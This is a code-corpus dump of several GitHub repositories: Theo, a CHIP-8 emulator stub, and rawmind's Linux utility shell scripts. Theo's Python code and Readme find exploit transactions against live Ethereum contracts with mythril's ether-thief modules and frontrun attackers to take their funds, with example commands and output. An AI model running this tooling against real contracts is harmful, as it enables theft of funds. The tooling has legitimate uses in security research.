"text": "import json\nimport re\nimport time\nfrom mythril.exceptions import CriticalError\nfrom mythril.mythril import MythrilAnalyzer, MythrilDisassembler, MythrilConfig\nfrom web3 import Web3\nfrom theo.exploit.exploit import Exploit\nfrom theo.exploit.exploit_item import ExploitItem\n\n\ndef find_exploits(rpcHTTP=None, rpcWS=None, rpcIPC=None, contract=\"\", account=\"\", account_pk=\"\") -> Exploit:\n conf = MythrilConfig()\n\n if re.match(r\"^https\", rpcHTTP):\n rpchost = rpcHTTP[8:]\n rpctls = True\n else:\n rpchost = rpcHTTP[7:]\n rpctls = False\n\n conf.set_api_rpc(rpchost, rpctls)\n\n try:\n disassembler = MythrilDisassembler(eth=conf.eth, enable_online_lookup=False)\n disassembler.load_from_address(contract)\n analyzer = MythrilAnalyzer(\n strategy=\"bfs\",\n disassembler=disassembler,\n address=contract,\n execution_timeout=120,\n max_depth=32,\n loop_bound=3,\n disable_dependency_pruning=False,\n onchain_storage_access=True,\n )\n except CriticalError as e:\n print(e)\n\n report = analyzer.fire_lasers(\n modules=[\"ether_thief\", \"suicide\"], transaction_count=3\n )\n\n if rpcIPC is not None:\n print(\"Connecting to IPC: {rpc}.\".format(rpc=rpcIPC))\n w3 = Web3(\n Web3.IPCProvider(rpcIPC)\n )\n elif rpcWS is not None:\n print(\"Connecting to WebSocket: {rpc}.\".format(rpc=rpcWS))\n w3 = Web3(\n Web3.WebsocketProvider(rpcWS)\n )\n else:\n print(\"Connecting to HTTP: {rpc}.\".format(rpc=rpcHTTP))\n w3 = Web3(\n Web3.HTTPProvider(rpcHTTP)\n )\n\n exploits = []\n for ri in report.issues:\n txs = []\n issue = report.issues[ri]\n\n for si in issue.transaction_sequence[\"steps\"]:\n txs.append(\n ExploitItem(tx_data={\"input\": si[\"input\"], \"value\": si[\"value\"]})\n )\n\n exploits.append(\n Exploit(\n txs=txs,\n w3=w3,\n contract=contract,\n account=account,\n account_pk=account_pk,\n )\n )\n\n return exploits\n"
},
{
"alpha_fraction": 0.6237590909004211,
"alphanum_fraction": 0.701522171497345,
"avg_line_length": 37.25316619873047,
"blob_id": "840fa6bec96de1272b6f14194515d496861e9b33",
"content_id": "99bc9731c88474daf8941af0a1048d064f77be44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6046,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 158,
"path": "/Readme.md",
"repo_name": "eniolasonowo/theo",
"src_encoding": "UTF-8",
"text": "# Theo\n\nTheo is a great hacker showing the other script kiddies how things should be done.\n\n\n\nHe knows [Karl](https://github.com/cleanunicorn/karl) from work.\n\nTheo's purpose is to fight script kiddies that try to be leet hackers. He can listen to them trying to exploit his honeypots and make them lose their funds, for his own gain.\n\n> \"You didn't bring me along for my charming personality.\"\n\n## Install\n\n```console\n$ git clone https://github.com/cleanunicorn/theo\n$ cd theo\n$ pip install -r requirements.txt\n```\n\nIt's recommended to use [virtualenv](https://virtualenv.pypa.io/en/latest/) if you're familiar with it.\n\nRequirements: \n\n- Python 3.5 or higher\n- An Ethereum node with RPC available\n- Accounts unlocked to be able to send transactions\n\n## Demo\n\n[Scrooge McEtherface](https://github.com/b-mueller/scrooge-mcetherface) tries to exploit a contract but Theo is able to successfully frontrun him.\n\n[](https://asciinema.org/a/KVbZpYZee39eWavEwiXMaemPI)\n\n## Usage\n\n### Help screen\n\nIt's a good idea to check the help screen first.\n\n```console\n$ python ./theo.py --help\nusage: theo.py [-h] [--rpc-http RPC_HTTP] [--rpc-ws RPC_WS]\n [--rpc-ipc RPC_IPC] [--account ACCOUNT] [--contract ADDRESS]\n [--txs {mythril,file}] [--txs-file FILE]\n {tx-pool}\n\nMonitor contracts for balance changes or tx pool.\n\npositional arguments:\n {tx-pool} Choose between: balance (not implemented: monitor\n contract balance changes), tx-pool (if any\n transactions want to call methods).\n\noptional arguments:\n -h, --help show this help message and exit\n --contract ADDRESS Contract to monitor\n\nMonitor transaction pool:\n --rpc-http RPC_HTTP Connect to this HTTP RPC\n --rpc-ws RPC_WS Connect to this WebSockets RPC\n --rpc-ipc RPC_IPC Connect to this IPC RPC\n --account ACCOUNT Use this account to send transactions from\n\nTransactions to wait for:\n --txs {mythril,file} Choose between: mythril (find transactions\n automatically with mythril), file (use the\n transactions specified in a JSON file).\n --txs-file FILE The file which contains the transactions to frontrun\n```\n\n### Symbolic execution\n\nA list of expoits is automatically identified using [mythril](https://github.com/ConsenSys/mythril).\n\nStart a session by running:\n\n```console\n$ python ./theo.py tx-pool --account=<your unlocked account> --contract=<honeypot>\n```\n\nIt will analyze the contract and will find a list of available exploits.\n\n```console\n$ python theo.py tx-pool --account=0xffcf8fdee72ac11b5c542428b35eef5769c409f0 --contract=0xd833215cbcc3f914bd1c9ece3ee7bf8b14f841bb \nScanning for exploits in contract: 0xd833215cbcc3f914bd1c9ece3ee7bf8b14f841bb\nFound exploit(s) [Exploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])]\nPython 3.7.3 (default, Jun 24 2019, 04:54:02) \n[GCC 9.1.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n(InteractiveConsole)\n>>>\n```\n\nYou can see the available exploits found. In this case one exploit was found. Each exploit is an [Exploit](https://github.com/cleanunicorn/theo/blob/263dc9f0cd34c4a0904529128c93f30b29eae415/theo/scanner/__init__.py#L9) object, having a list of transactions to exploit a bug.\n\n```console\n>>> exploits[0]\nExploit: (txs=[Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}])\n```\n\nYou can start the frontrunning monitor to listen for other hackers (script kiddies really) trying to exploit his honeypots.\n\nUse `.frontrun()` to start listening for the exploit and when found send a transaction with a higher gas price.\n\n```console\n>>> exploits[0].frontrun()\nWaiting for a victim to reach into the honey jar.\nListening for Transaction: {'input': '0xcf7a8965', 'value': '0xde0b6b3a7640000'}.\nFound pending tx: 0x74eb78557b4659f27e7a8b82804ae97be9d0adfefd6a5652a097045f6de77a0b from: 0x1df62f291b2e969fb0849d99d9ce41e2f137006e.\nFrontrunning with tx: {'from': '0xffcf8fdee72ac11b5c542428b35eef5769c409f0', 'to': '0xd833215cbcc3f914bd1c9ece3ee7bf8b14f841bb', 'gasPrice': '0x3b9aca01', 'input': '0xcf7a8965', 'gas': '0x4c4b40', 'value': '0xde0b6b3a7640000'}\nMined transaction: 0x0b5e7ceedd600eaf013ca8bc74900e6d29b25ed422baaa776f42bec01870a288\n```\n\n> \"Oh, my God! The quarterback is toast!\"\n\nThis works very well for some specially crafted [contracts](./contracts/) or some other vulnerable contracts, as long as you make sure frontrunning is in your favor.\n\n### Load transactions from file\n\nInstead of identifying the exploits with mythril, you can specify the list of exploits yourself.\n\nCreate a file that looks like this [input-tx.json](./test/input-tx.json):\n\n```json\n[\n [\n {\n \"input\": \"0x4e71e0c8\",\n \"value\": \"0xde0b6b3a7640000\"\n },\n {\n \"input\": \"0x2e64cec1\",\n \"value\": \"0x0\"\n }\n ],\n [\n {\n \"input\": \"0x4e71e0c8\",\n \"value\": \"0xde0b6b3a7640000\"\n }\n ]\n]\n```\n\nThis one defines 2 exploits, the first one has 2 transactions and the second one only 1 transaction. After the exploits are loaded, frontrunning is the same.\n\n```console\n$ python ./theo.py --txs=file --contract=0xe78a0f7e598cc8b0bb87894b0f60dd2a88d6a8ab --account=0xffcf8fdee72ac11b5c542428b35eef5769c409f0 --txs-file=./test/input-tx.json tx-pool 130 ↵\nFound exploits(s) [Exploit: (txs=[Transaction: {'input': '0x4e71e0c8', 'value': '0xde0b6b3a7640000'}, Transaction: {'input': '0x2e64cec1', 'value': '0x0'}]), Exploit: (txs=[Transaction: {'input': '0x4e71e0c8', 'value': '0xde0b6b3a7640000'}])]\nPython 3.7.3 (default, Jun 24 2019, 04:54:02) \n[GCC 9.1.0] on linux\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n(InteractiveConsole)\n>>> exploits[0].frontrun()\nWaiting for a victim to reach into the honey jar.\nListening for Transaction: {'input': '0x4e71e0c8', 'value': '0xde0b6b3a7640000'}.\n```\n"
}
] | 8 |
safder-aree/chip8emulator
|
https://github.com/safder-aree/chip8emulator
|
ab9fccd0a649a991d9f01749d3135d8a35b7488d
|
a81b21bc8e91c12fc1c3ef96c5ea58335d649a56
|
76530d8efc37bfc67a88ec9b3e462ebc8a4221fd
|
refs/heads/master
| 2020-05-15T23:58:14.139380 | 2019-04-21T18:13:11 | 2019-04-21T18:13:11 | 182,567,126 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5852981805801392,
"alphanum_fraction": 0.628294050693512,
"avg_line_length": 18.486486434936523,
"blob_id": "7170714d8cbb926539c3a4c5094693d3365296ed",
"content_id": "4dbf43d69b936021b6975d6c3ae1dd9bb8714810",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 721,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 37,
"path": "/main.py",
"repo_name": "safder-aree/chip8emulator",
"src_encoding": "UTF-8",
"text": "# Import packages\nimport itertools\nimport os\nimport pyglet\nimport random\nimport sys\nimport time\n\n\ndef initialize(self):\n self.clear()\n self.memory = [0]*4096 # max 4096\n self.gpio = [0]*16 # max 16\n self.display_buffer = [0]*64*32 # 64*32\n self.stack = []\n self.key_inputs = [0]*16\n self.opcode = 0\n self.index = 0\n\n\n self.delay_timer = 0\n self.sound_timer = 0\n self.should_draw = False\n\n# Main loop structure\n\n\ndef main(self):\n\n # Initialize the variables and set registers to zero, reset key inputs\n self.initialize()\n self.load_rom(sys.argv[1])\n while not self.has_exit:\n self.dispatch_events()\n # Point to the offset\n self.cycle()\n self.draw()\n"
}
] | 1 |
rawmind/utils
|
https://github.com/rawmind/utils
|
033bdd45874f61b04c338ecfc466e735785061b5
|
cb1ad03a12e43300b47d1e5401bb3a6a9315e522
|
87a9db613d73e8882c8a2257eb39fa550d1e965c
|
refs/heads/master
| 2016-09-05T16:24:41.805404 | 2015-01-11T03:21:07 | 2015-01-11T03:21:07 | 29,079,120 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5404758453369141,
"alphanum_fraction": 0.5478912591934204,
"avg_line_length": 33.525333404541016,
"blob_id": "64d9e84555aa69821abfc5f78dc7f90fd5d493b3",
"content_id": "367648ded5ac5f8a16a3a8889a8caf786b75fe84",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 13705,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 375,
"path": "/ullkd.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Copyright (C) 2012 Sorokin Alexei <[email protected]>\n# Civil <[email protected]>\n# Homepage: http://ubuntovod.ru/soft/ullkd.html\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://gnu.org/licenses/>.\n\nIsDebianBased() {\n if [ -r \"/etc/debian_version\" ]; then\n return 0;\n else\n return 1;\n fi;\n}\n\nIsRussian() {\n if [ -z $(echo \"${LANG}\" | grep \"^ru\") ] && [ -z $(echo \"${LANG}\" | grep \"^uk\") ]; then\n return 1;\n else\n return 0;\n fi;\n}\n\nUsage() {\n if ( ! IsRussian ); then\n echo -n \"Использование:\";\n else\n echo -n \"Usage:\";\n fi;\n echo \" \\`$(basename $0)' [-h] [-v] [-b] [-p] [-r] [-m ...]\";\n return 0;\n}\n\nErrorFunc() {\n Usage;\n if ( ! IsRussian ); then\n echo \"Try \\`$(basename $0)' -h for more information.\";\n else\n echo \"Запустите \\`$(basename $0)' для получения более подробной справки.\";\n fi;\n return 1;\n}\n\nParamCheck() {\n Title=\"ULLKD: Ubuntu Latest Linux Kernel Downloader v0.3\";\n while getopts \"bprm:hv\" ParamStr ${argv}; do\n case \"${ParamStr}\" in\n b)\n export UbuntuBranchMode=true;\n ;;\n p)\n export PfKernelMode=true;\n ;;\n r)\n export RemoveNonlatestKernelsMode=true;\n ;;\n m)\n export Mirror=\"${OPTARG}\";\n ;;\n h)\n echo \"${Title}\";\n Usage;\n if ( ! IsRussian ); then\n echo -e \"\\n -b install kernel from Ubuntu branch\";\n echo \" -p install pf-kernel build of NiGHt-LEshiY\";\n echo \" -r remove nonlatest kernels\";\n echo \" -m set download mirror (http://archive.ubuntu.com/ubuntu/ by default)\";\n echo \" -h print this help and exit\";\n echo \" -v display the current version and exit\";\n echo -e \"\\nReport problems to <[email protected]>.\";\n else\n echo -e \"\\n -b установить ядро из ветки Ubuntu\";\n echo \" -p установить сборку pf-kernel от NiGHt-LEshiY\";\n echo \" -r удалить непоследние ядра\";\n echo \" -m выставить зеркало загрузки (http://archive.ubuntu.com/ubuntu/ по умолчанию)\";\n echo \" -h вывод этой справки и выход\";\n echo \" -v вывод информации о версии и выход\";\n echo -e \"\\nСообщения о замеченных ошибках отправляйте по адресу <[email protected]>.\";\n fi;\n exit 0;\n ;;\n v)\n echo \"${Title}\";\n exit 0;\n ;;\n *)\n ErrorFunc;\n return 1;\n ;;\n esac;\n done;\n shift \"$((OPTIND - 1))\";\n return 0;\n}\n\nDownloader() {\n if [ -z \"$1\" ]; then\n if ( ! IsRussian ); then\n echo \"Please, define download URL.\" >&2;\n else\n echo \"Пожалуйта, укажите URL для загрузки.\" >&2;\n fi;\n return 1;\n fi;\n if [ -z \"$2\" ]; then\n Output=\"$(basename $1)\";\n else\n Output=\"$2\";\n fi;\n if ( which 'curl' > /dev/null ); then\n curl -s -o \"${Output}\" \"$1\";\n return $?;\n elif ( which 'wget' > /dev/null ); then\n wget -O \"${Output}\" -q \"$1\";\n return $?;\n else\n if ( ! IsRussian ); then\n echo \"Please, install curl or wget to proceed.\" >&2;\n else\n echo \"Пожалуйста, установите curl или wget для продолжения.\" >&2;\n fi;\n exit 1;\n fi;\n}\n\nKernelDownload() {\n if ( ! IsRussian ); then\n echo \"Initializing Linux kernel v${KernelVersion} packages download...\";\n else\n echo \"Инициализация загрузки пакетов ядра Linux v${KernelVersion}...\";\n fi;\n for Count in $(seq 0 $((URLCount- 1))); do\n if ( ! IsRussian ); then\n echo \"Downloading package $((Count + 1)) from ${URLCount}...\";\n else\n echo \"Загрузка пакета $((Count + 1)) из ${URLCount}...\";\n fi;\n if ( ! Downloader \"${URLs[${Count}]}\" ); then\n if ( ! IsRussian ); then\n echo \"An error occured, exiting...\" >&2;\n else\n echo \"Произошла ошибка, выход...\" >&2;\n fi;\n Finish;\n return 1;\n fi;\n done;\n return 0;\n}\n\nKernelInstall() {\n if ( ! IsRussian ); then\n echo -e \"\\nInstalling all downloaded packages...\";\n else\n echo -e \"\\nУстановка всех загруженных пакетов...\" >&2;\n fi;\n dpkg -i -R \"${PWD}\";\n apt-get install -f;\n return $?;\n}\n\nInstaller() {\n if ( ! KernelDownload ); then\n return 1;\n fi;\n KernelInstall;\n}\n\nRepoKernel() {\n if [ -z \"${Mirror}\" ]; then\n Mirror=\"http://archive.ubuntu.com/ubuntu/\";\n fi;\n Architecture=$(dpkg --print-architecture);\n\n export KernelVersion=$(Downloader \"${Mirror}/pool/main/l/linux/\" - | tr '\"' '\\n' | grep '^linux-image' | \\\n sed -n '$p' | tr '_' '\\n' | sed -n '2p');\n KernelVersionDot=$(echo \"${KernelVersion}\" | tr '-' '.');\n KernelVersionMajor=$(echo \"${KernelVersion}\" | sed -e 's/\\.[^.]*$//g');\n KernelMetaVersion=$(Downloader \"${Mirror}/pool/main/l/linux-meta/\" - | tr '\"' '\\n' | grep '^linux-image' | \\\n sed -n '$p' | tr '_' '\\n' | sed -n '2p');\n\n URLCount=6;\n URLs[0]=\"${Mirror}/pool/main/l/linux-meta/linux-image-generic_${KernelMetaVersion}_${Architecture}.deb\";\n URLs[1]=\"${Mirror}/pool/main/l/linux-meta/linux-headers-generic_${KernelMetaVersion}_${Architecture}.deb\";\n URLs[2]=\"${Mirror}/pool/main/l/linux/linux-image-${KernelVersionMajor}-generic_${KernelVersion}_${Architecture}.deb\";\n URLs[3]=\"${Mirror}/pool/main/l/linux/linux-image-extra-${KernelVersionMajor}-generic_${KernelVersion}_${Architecture}.deb\";\n URLs[4]=\"${Mirror}/pool/main/l/linux/linux-headers-${KernelVersionMajor}_${KernelVersion}_all.deb\";\n URLs[5]=\"${Mirror}/pool/main/l/linux/linux-headers-${KernelVersionMajor}-generic_${KernelVersion}_${Architecture}.deb\";\n\n Installer;\n ExitCode=$?;\n\n for Count in $(seq 0 $((URLCount - 1))); do\n Name=$(basename \"${URLs[${Count}]}\" | tr '_' '\\n' | sed -n '1p');\n if [[ ! \"${Name}\" == 'linux-image-generic' ]] && [[ ! \"${Name}\" == 'linux-headers-generic' ]]; then\n apt-mark auto \"${Name}\";\n fi;\n done;\n return \"${ExitCode}\";\n}\n\nPPAKernel() {\n Mirror=\"http://kernel.ubuntu.com/~kernel-ppa/mainline/\";\n Architecture=$(dpkg --print-architecture);\n\n KernelVersionMajor=$(Downloader \"${Mirror}\" - | grep -v '\\-rc' | \\\n sed -n 's/<a href=\"/\\n/p' | tr '\"' '\\n' | grep '^v' | sed -n '$p');\n KernelVersionData=$(Downloader ${Mirror}/${KernelVersionMajor} - | sed -n 's/<a href=\"/\\n/p' | \\\n tr '\"' '\\n' | grep -m 1 '^linux-image' | tr '_' '\\n' | sed -n '2p');\n export KernelVersion=$(echo \"${KernelVersionData}\" | sed -e 's/\\(.*\\)\\.\\([[:digit:]]*\\)/\\1/');\n\n URLCount=4;\n URLs[0]=\"${Mirror}/${KernelVersionMajor}/linux-headers-${KernelVersion}_${KernelVersionData}_all.deb\";\n URLs[1]=\"${Mirror}/${KernelVersionMajor}/linux-headers-${KernelVersion}-generic_${KernelVersionData}_${Architecture}.deb\";\n URLs[2]=\"${Mirror}/${KernelVersionMajor}/linux-image-${KernelVersion}-generic_${KernelVersionData}_${Architecture}.deb\";\n URLs[3]=\"${Mirror}/${KernelVersionMajor}/linux-image-extra-${KernelVersion}-generic_${KernelVersionData}_${Architecture}.deb\";\n\n Installer;\n return $?;\n}\n\nPfKernel() {\n Mirror=\"http://kernel.night-leshiy.ru/\";\n Architecture=$(dpkg --print-architecture);\n PageFile=\"/tmp/linux-kernel-packages/pf-kernel.htm\";\n\n if ( ! Downloader \"${Mirror}\" - > \"${PageFile}\" ); then\n if ( ! IsRussian ); then\n echo \"An error occured, exiting...\" >&2;\n else\n echo \"Произошла ошибка, выход...\" >&2;\n fi;\n Finish;\n return 1;\n fi;\n export KernelVersion=$(cat \"${PageFile}\" | grep '\\(ubuntu/\\|mint/\\)' | \\\n grep -E -o \"([0-9]+\\.){2}[0-9]([-a-zA-Z0-9]+)?(_[a-zA-Z0-9])?\" | sort -u);\n\n URLCount=2;\n if [[ $(cat \"${PageFile}\" | grep -c 'id=\"ubuntu\"' -) != 0 ]]; then\n URLs[0]=\"${Mirror}/ubuntu/linux-image-${KernelVersion}_${Architecture}.deb\";\n URLs[1]=\"${Mirror}/ubuntu/linux-headers-${KernelVersion}_${Architecture}.deb\";\n else\n URLs[0]=\"${Mirror}/mint/linux-image-${KernelVersion}_${Architecture}.deb\";\n URLs[1]=\"${Mirror}/mint/linux-headers-${KernelVersion}_${Architecture}.deb\";\n fi;\n rm -f \"${PageFile}\";\n\n Installer;\n return $?;\n}\n\nRemoveNonlatestKernels() {\n InstalledKernelPackages=$(dpkg --get-selections | sed -e 's/\\t//g;s/install//g' | grep '^linux');\n InstalledKernelPackages=$(echo \"${InstalledKernelPackages}\" | grep '^linux-image'; \\\n echo \"${InstalledKernelPackages}\" | grep '^linux-headers');\n SavedKernelPackagesCandidates=$(echo \"${InstalledKernelPackages}\" | grep '^linux-image');\n SavedKernelVersion=$(echo \"${SavedKernelPackagesCandidates}\" | tr ' ' '\\n' | grep -E -o \\\n '[[:digit:]]+\\.[[:digit:]]+(\\.[[:digit:]]+)?(-[[:digit:]]+)?(\\.[[:lower:]]+)?' | sort -u --version-sort | sed -n '$p');\n KernelVersionsToRemove=$(echo \"${InstalledKernelPackages}\" | tr ' ' '\\n' | grep -v \"\\-${SavedKernelVersion}\");\n if [[ -z \"${KernelVersionsToRemove}\" ]]; then\n if ( ! IsRussian ); then\n echo \"Nothing to remove, exiting...\";\n else\n echo \"Нечего удалять, выход...\";\n fi;\n else\n apt-get purge ${KernelVersionsToRemove};\n fi;\n return $?;\n}\n\nFinish() {\n cd '/';\n rm -rf \"/tmp/linux-kernel-packages\";\n}\n\nargc=\"$#\"; argv=\"$@\";\ntrap Finish EXIT;\nParamCheck;\nif [[ $? != 0 ]]; then\n exit 1;\nfi;\n\nif ( ! IsDebianBased ); then\n if ( ! IsRussian ); then\n echo \"Running distribution is not Debian-based, executing stopped for safety reason.\" >&2;\n else\n echo \"Запущенный дистрибутив не является основанным на Debian, выполнение остановлено по причинам безопасности.\" >&2;\n fi;\n exit 1;\nfi;\n\nif [[ \"$(id -u)\" != 0 ]]; then\n if ( which 'sudo' > /dev/null ); then\n sudo bash \"$0\" $@;\n exit $?;\n else\n su -c bash \"$0\" $@;\n exit $?;\n fi;\nfi;\n\nrm -rf \"/tmp/linux-kernel-packages\";\nmkdir -p \"/tmp/linux-kernel-packages\";\ncd \"/tmp/linux-kernel-packages\";\n\nif [[ \"${UbuntuBranchMode}\" == true ]]; then\n if ( ! IsRussian ); then\n Greeter=\"Latest Linux kernel packages will be installed from Ubuntu branch...\";\n else\n Greeter=\"Последние пакеты ядра Linux будут поставлены из ветки Ubuntu...\";\n fi;\nelif [[ \"${PfKernelMode}\" == true ]]; then\n if ( ! IsRussian ); then\n Greeter=\"Latest pf-kernel packages from NiGHt-LEshiY will be installed...\";\n else\n Greeter=\"Последние пакеты pf-kernel of NiGHt-LEshiY будут поставлены...\";\n fi;\nelif [[ \"${RemoveNonlatestKernelsMode}\" == true ]]; then\n if ( ! IsRussian ); then\n Greeter=\"All nonlatest Linux kernels will be removed...\";\n else\n Greeter=\"Все непоследние ядра Linux будут удалены...\";\n fi;\nelse\n if ( ! IsRussian ); then\n Greeter=\"Latest Linux kernel packages will be installed from kernel.ubuntu.com...\";\n else\n Greeter=\"Последние пакеты ядра Linux будут поставлены из kernel.ubuntu.com...\";\n fi;\nfi;\n\nif ( which 'cowsay' > /dev/null ); then\n cowsay -f \"tux\" \"${Greeter}\";\nelse\n echo -e \"${Greeter}\\n\";\nfi;\n\nif [[ \"${UbuntuBranchMode}\" == true ]]; then\n RepoKernel;\n ExitCode=$?;\nelif [[ \"${PfKernelMode}\" == true ]]; then\n PfKernel;\n ExitCode=$?;\nelif [[ \"${RemoveNonlatestKernelsMode}\" == true ]]; then\n RemoveNonlatestKernels;\n ExitCode=$?;\nelse\n PPAKernel;\n ExitCode=$?;\nfi;\n\nif [[ \"${ExitCode}\" == 0 ]]; then\n if ( ! IsRussian ); then\n echo -e \"\\nTask completed, thank you for using this script.\";\n echo \"Script author: XRevan86, inspired by ubuntovod.ru, licensed under GNU GPLv3+\";\n else\n echo -e \"\\nЗадача выполнена, спасибо за использование этого скрипта.\";\n echo \"Автор скрипта: XRevan86, вдохновлено ubuntovod.ru, лицензировано под GNU GPLv3+\";\n fi;\nfi;\nexit $?;"
},
{
"alpha_fraction": 0.624454140663147,
"alphanum_fraction": 0.6419214010238647,
"avg_line_length": 21.799999237060547,
"blob_id": "fed7e6804a5079ef17ae70155ce959c331e79270",
"content_id": "28b8e7320fbb805fadf6c81c82b92f285bb01bb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 229,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 10,
"path": "/touchpad.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\nfunction switch(){\nlocal device_id=14;\nlocal state=$(xinput --list-props $device_id | grep \"Device Enabled\" | cut -d\":\" -f2)\n[ $state -eq 0 ] && xinput --enable $device_id || xinput --disable $device_id\n}\n\nswitch\n\n"
},
{
"alpha_fraction": 0.7440677881240845,
"alphanum_fraction": 0.7661017179489136,
"avg_line_length": 30.052631378173828,
"blob_id": "428199f1c71c9f20c998e65e97450e801a343116",
"content_id": "61c3f1d62976336daa1cc60fae32358864741a4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1180,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 38,
"path": "/old_arm_toolset_deploy.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n#deb http://www.emdebian.org/debian/ squeeze main\n# deb http://backports.debian.org/debian-backports squeeze-backports main\n\n\napt-key adv --keyserver keyserver.ubuntu.com --recv-keys AED4B06F473041FA\napt-key adv --keyserver keyserver.ubuntu.com --recv-keys B5B7720097BB3B58\n\napt-get update\napt-get install emdebian-archive-keyring\napt-get update\napt-cache search armel\napt-get install linux-libc-dev-armel-cross\napt-get install libc6-armel-cross libc6-dev-armel-cross\napt-get install binutils-arm-linux-gnueabi\napt-get install gcc-4.4-arm-linux-gnueabi\napt-get install g++-4.4-arm-linux-gnueabi\n\napt-get install gcc-arm-linux-gnueabi\n\napt-get install xapt\nxapt -a armel libfoo-dev\napt-get install gdb-arm-linux-gnu\n\napt-get install pdebuild-cross dpkg-cross\n\n#To install uuencode, uudecode\napt-get install sharutils \n\n#ln -s -f /usr/bin/arm-linux-gnueabi-gcc /usr/bin/arm-eabi-gcc \n#ln -s -f /usr/bin/arm-linux-gnueabi-ar /usr/bin/arm-eabi-ar\n#ln -s -f /usr/bin/arm-linux-gnueabi-ld /usr/bin/arm-eabi-ld\n#ln -s -f /usr/bin/arm-linux-gnueabi-nm /usr/bin/arm-eabi-nm\n#ln -s -f /usr/bin/arm-linux-gnueabi-objcopy /usr/bin/arm-eabi-objcopy\n\n#check\narm-linux-gnueabi-gcc -v\n"
},
{
"alpha_fraction": 0.6378600597381592,
"alphanum_fraction": 0.6625514626502991,
"avg_line_length": 26,
"blob_id": "dc05e4021ca7907a7cbabfa951d5863d153990e3",
"content_id": "4fae7f722248deb6d6210fe0d55c5d8c297a035a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 243,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 9,
"path": "/java_install_alt.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nJDK_BIN_PATH=/usr/lib/jvm/jdk1.8.0_25/bin\n\nfor binary in $(ls $JDK_BIN_PATH/*); do\n name=$(basename $binary)\n update-alternatives --install /usr/bin/${name} ${name} ${binary} 1\n update-alternatives --set ${name} ${binary}\ndone\n"
},
{
"alpha_fraction": 0.6212121248245239,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 32,
"blob_id": "268577ca48d72a19063d1ebd96f26cc4e1d0b39c",
"content_id": "8ddfb0c48460e1e408b7d4c8fd0d52161a96fd98",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 66,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 2,
"path": "/ps_snapshoot.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nps -eo pmem,pcpu,rss,vsize,args | sort -k 1 -r | less\n"
},
{
"alpha_fraction": 0.7339901328086853,
"alphanum_fraction": 0.7339901328086853,
"avg_line_length": 24.375,
"blob_id": "e77bf87cf377b651f02336da58649b5334fc628b",
"content_id": "f7b34e9ff9932bf875b695c653a2de28888c038b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 203,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/git_init_local_repo.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ngit init\ngit config --local user.name \"rawmind\"\ngit config --local user.email [email protected]\ngit remote add origin https://[email protected]/rawmind/${PWD##*/}\ntouch .gitignore\ngit add .gitignore\n"
},
{
"alpha_fraction": 0.6506224274635315,
"alphanum_fraction": 0.6647303104400635,
"avg_line_length": 21.69811248779297,
"blob_id": "78281a966a39825d7cdb4644d2f2459e5bf86c73",
"content_id": "ec1073a964c30848d2c86b30352ead9d051463e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1208,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 53,
"path": "/lock_freq.sh",
"repo_name": "rawmind/utils",
"src_encoding": "UTF-8",
